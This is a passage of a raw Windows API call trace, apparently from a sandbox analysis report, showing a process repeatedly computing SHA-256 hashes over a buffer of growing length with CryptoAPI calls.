[0189.659] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0189.659] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0189.659] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338222d0) returned 1 [0189.660] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.660] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0189.660] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace040 [0189.660] CryptDestroyHash (hHash=0x3396f580) returned 1 [0189.660] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0189.660] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338227d0) returned 1 [0189.661] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.661] CryptHashData (hHash=0x3396ee10, pbData=0x32348160, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0189.661] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace0d0 [0189.661] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0189.661] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0189.661] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.662] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.662] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0189.662] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd800 [0189.662] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0189.662] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.662] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822fd0) returned 1 [0189.662] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.663] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x200, dwFlags=0x0) returned 1 [0189.663] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace100 [0189.663] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.663] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0189.663] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822dd0) returned 1 [0189.663] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.663] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x220, dwFlags=0x0) returned 1 [0189.663] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd830 [0189.663] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.663] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0189.663] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338221d0) returned 1 [0189.664] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.664] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0x240, dwFlags=0x0) returned 1 [0189.664] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace160 [0189.664] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0189.664] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0189.664] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338223d0) returned 1 [0189.668] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.668] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x260, dwFlags=0x0) returned 1 [0189.668] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace130 [0189.668] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.668] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0189.668] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.669] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.669] CryptHashData (hHash=0x3396ee10, pbData=0x32348160, dwDataLen=0x280, dwFlags=0x0) returned 1 [0189.669] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace370 [0189.669] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0189.669] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.669] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338237d0) returned 1 [0189.669] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.670] CryptHashData (hHash=0x3396f190, pbData=0x32348160, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0189.670] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acecd0 [0189.670] CryptDestroyHash (hHash=0x3396f190) returned 1 [0189.670] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0189.670] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338239d0) returned 1 [0189.670] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.670] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0189.670] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace700 [0189.670] CryptDestroyHash (hHash=0x3396f350) returned 1 [0189.670] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0189.670] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821dd0) returned 1 [0189.671] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.671] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0189.671] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32aced00 [0189.671] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0189.671] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0189.671] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822cd0) returned 1 [0189.671] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.672] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0x300, dwFlags=0x0) returned 1 [0189.672] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace670 [0189.672] CryptDestroyHash (hHash=0x3396f120) returned 1 [0189.672] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0189.672] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338238d0) returned 1 [0189.672] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.672] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0x320, dwFlags=0x0) returned 1 [0189.672] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace7c0 [0189.672] CryptDestroyHash (hHash=0x3396f580) returned 1 [0189.672] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0189.672] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822dd0) returned 1 [0189.673] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.673] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0x340, dwFlags=0x0) returned 1 [0189.673] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acee80 [0189.673] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0189.673] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0189.673] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822ed0) returned 1 [0189.674] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.674] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0x360, dwFlags=0x0) returned 1 [0189.674] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace850 [0189.674] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0189.674] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0189.674] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338233d0) returned 1 [0189.674] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.674] CryptHashData (hHash=0x3396ea90, pbData=0x32348160, dwDataLen=0x380, dwFlags=0x0) returned 1 [0189.674] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace5e0 [0189.674] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0189.674] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0189.674] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338230d0) returned 1 [0189.675] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.675] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0189.675] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace8b0 [0189.675] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0189.675] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0189.675] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338226d0) returned 1 [0189.676] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.676] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0189.676] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace760 [0189.676] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0189.676] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0189.676] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.676] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.676] CryptHashData (hHash=0x3396f4a0, pbData=0x32348160, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0189.676] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace730 [0189.676] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0189.676] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.676] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338230d0) returned 1 [0189.677] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.677] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x400, dwFlags=0x0) returned 1 [0189.677] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32aced30 [0189.677] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0189.677] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0189.677] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821fd0) returned 1 [0189.678] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.678] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0x420, dwFlags=0x0) returned 1 [0189.678] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace610 [0189.678] CryptDestroyHash (hHash=0x3396f580) returned 1 [0189.678] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0189.678] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338237d0) returned 1 [0189.678] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.678] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x440, dwFlags=0x0) returned 1 [0189.678] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace790 [0189.678] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.678] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0189.679] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338232d0) returned 1 [0189.679] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.679] CryptHashData (hHash=0x3396ee10, pbData=0x32348160, dwDataLen=0x460, dwFlags=0x0) returned 1 [0189.679] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace5b0 [0189.679] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0189.679] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0189.679] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822dd0) returned 1 [0189.680] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.680] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0x480, dwFlags=0x0) returned 1 [0189.680] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace640 [0189.680] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0189.680] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0189.680] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338231d0) returned 1 [0189.680] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.680] CryptHashData (hHash=0x3396eb00, pbData=0x32348160, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0189.680] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace820 [0189.680] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0189.680] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0189.680] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338226d0) returned 1 [0189.683] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.683] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0189.683] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acea30 [0189.683] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0189.683] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0189.683] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338234d0) returned 1 [0189.683] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.683] CryptHashData (hHash=0x3396eda0, pbData=0x32348160, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0189.684] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace6a0 [0189.684] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0189.684] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0189.684] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822ed0) returned 1 [0189.684] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.684] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0x500, dwFlags=0x0) returned 1 [0189.684] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acea60 [0189.684] CryptDestroyHash (hHash=0x3396f120) returned 1 [0189.684] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0189.684] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822dd0) returned 1 [0189.685] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.685] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x520, dwFlags=0x0) returned 1 [0189.685] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace880 [0189.685] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.685] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0189.685] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338229d0) returned 1 [0189.685] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.685] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0x540, dwFlags=0x0) returned 1 [0189.686] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace3a0 [0189.686] CryptDestroyHash (hHash=0x3396f350) returned 1 [0189.686] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0189.686] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338220d0) returned 1 [0189.687] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.687] CryptHashData (hHash=0x3396ee10, pbData=0x32348160, dwDataLen=0x560, dwFlags=0x0) returned 1 [0189.687] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acea00 [0189.687] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0189.687] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0189.687] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822cd0) returned 1 [0189.688] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.688] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0x580, dwFlags=0x0) returned 1 [0189.688] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace6d0 [0189.688] CryptDestroyHash (hHash=0x3396f350) returned 1 [0189.688] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0189.688] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338233d0) returned 1 [0189.688] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.688] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0189.688] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace7f0 [0189.688] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.688] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0189.689] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821dd0) returned 1 [0189.689] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.689] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0189.689] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace910 [0189.690] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.690] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0189.690] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338223d0) returned 1 [0189.690] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.690] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0189.690] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace460 [0189.690] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0189.690] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0189.690] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338221d0) returned 1 [0189.691] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.691] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x600, dwFlags=0x0) returned 1 [0189.691] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace8e0 [0189.691] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.691] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0189.691] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.696] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.696] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0x620, dwFlags=0x0) returned 1 [0189.696] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace400 [0189.696] CryptDestroyHash (hHash=0x3396f660) returned 1 [0189.696] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.696] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33823bd0) returned 1 [0189.699] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.699] CryptHashData (hHash=0x3396ee80, pbData=0x32348160, dwDataLen=0x640, dwFlags=0x0) returned 1 [0189.699] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ace940 [0189.699] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0189.699] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0189.699] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338239d0) returned 1 [0189.699] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.699] CryptHashData (hHash=0x3396ee10, pbData=0x32348160, dwDataLen=0x660, dwFlags=0x0) returned 1 [0189.699] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acedc0 [0189.699] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0189.699] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0189.699] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338230d0) returned 1 [0189.700] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.700] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0x680, dwFlags=0x0) returned 1 [0189.700] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32aceb80 [0189.700] CryptDestroyHash (hHash=0x3396f350) returned 1 [0189.700] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0189.700] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822cd0) returned 1 [0189.701] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.701] CryptHashData (hHash=0x3396efd0, 